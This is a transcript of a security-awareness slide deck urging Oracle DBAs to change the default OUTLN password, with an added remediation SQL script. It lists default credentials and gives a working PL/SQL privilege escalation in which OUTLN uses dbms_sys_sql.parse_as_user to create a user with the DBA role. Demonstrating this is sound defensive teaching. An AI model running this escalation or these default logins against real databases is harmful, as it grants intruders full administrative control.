
Reminder: Change Default OUTLN Passwords for Enhanced Security

Learn how to change the OUTLN password and avoid potential security risks. The tutorial includes sample SQL commands that create a new user with the DBA privilege in the database, effectively executing code as a DBA.


Presentation Transcript


  1. Remember to change the OUTLN password

     Urs Messerli
     Messerli Datenbanktechnik GmbH
     www.datenbanktechnik.ch

  2. Default passwords

     • sys/change_on_install
     • system/manager
     • outln/outln

  3. Log on as OUTLN

         SQL> show user
         USER is "OUTLN"
         SQL> select * from all_users where username = 'HACKY';

         no rows selected

  4.     SQL> select * FROM SESSION_PRIVS;

         PRIVILEGE
         ----------------------------------------
         CREATE SESSION
         ALTER SESSION
         UNLIMITED TABLESPACE
         CREATE TABLE
         CREATE CLUSTER
         CREATE SYNONYM
         CREATE VIEW
         CREATE SEQUENCE
         CREATE DATABASE LINK
         CREATE PROCEDURE
         EXECUTE ANY PROCEDURE
         CREATE TRIGGER
         CREATE TYPE
         CREATE OPERATOR
         CREATE INDEXTYPE

         15 rows selected.

     OUTLN has lots of privileges

  5. So create a user with DBA privilege

         DECLARE
           mycur INTEGER;
         BEGIN
           mycur := sys.dbms_sys_sql.open_cursor;
           sys.dbms_sys_sql.parse_as_user(mycur,
             'create user hacky identified by macho', dbms_sql.native, 0);
           sys.dbms_sys_sql.parse_as_user(mycur,
             'grant dba to hacky', dbms_sql.native, 0);
           sys.dbms_sys_sql.close_cursor(mycur);
         END;
         /

         PL/SQL procedure successfully completed.

  6. So I did create the user, but I don’t have the privileges myself

         SQL> DROP USER HACKY;
         DROP USER HACKY
         *
         ERROR at line 1:
         ORA-01031: insufficient privileges

  7. The keys to the kingdom

     • I have created a new user with DBA privilege
     • I have executed code as the DBA
     • I could do anything!
     • Worried?

  8. The Moral of this story is…

     • Change all the default passwords
     • Including OUTLN/OUTLN

  9. Remember to change the OUTLN password

     Urs Messerli
     Messerli Datenbanktechnik GmbH
     www.datenbanktechnik.ch
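
A DBA-side follow-up to the moral on slide 8, added here as an example that is not part of the original presentation: find accounts still on default passwords, change and lock OUTLN, and review the privilege and role grants the slides rely on. It assumes Oracle 11g or later (for the DBA_USERS_WITH_DEFPWD view), a SQL*Plus session with DBA privileges, and that nothing needs to log in as OUTLN; the password and the 30-day window are placeholders.

```sql
-- Added example, not from the original slides. Run as a DBA in SQL*Plus.
-- Assumes Oracle 11g or later, where DBA_USERS_WITH_DEFPWD exists.

-- 1. Accounts whose password is still a known default (e.g. outln/outln).
SELECT d.username, u.account_status
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 ORDER BY d.username;

-- 2. Change the OUTLN password, then lock and expire the account.
--    The password is a placeholder: substitute your own strong value.
ALTER USER outln IDENTIFIED BY "Replace_With_Strong_Pw_1";
ALTER USER outln ACCOUNT LOCK PASSWORD EXPIRE;

-- 3. EXECUTE ANY PROCEDURE is in OUTLN's privilege list on slide 4.
--    Review every account or role that holds it.
SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'EXECUTE ANY PROCEDURE'
 ORDER BY grantee;

-- 4. Who holds the DBA role? A grantee you do not recognise (such as
--    the HACKY user created on slide 5) needs investigating.
SELECT r.grantee, u.created
  FROM dba_role_privs r
  LEFT JOIN dba_users u ON u.username = r.grantee
 WHERE r.granted_role = 'DBA'
 ORDER BY u.created DESC NULLS LAST;

-- 5. Recently created accounts. The 30-day window is an arbitrary
--    choice for this example; widen it to match your review period.
SELECT username, created, account_status
  FROM dba_users
 WHERE created > SYSDATE - 30
 ORDER BY created DESC;
```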
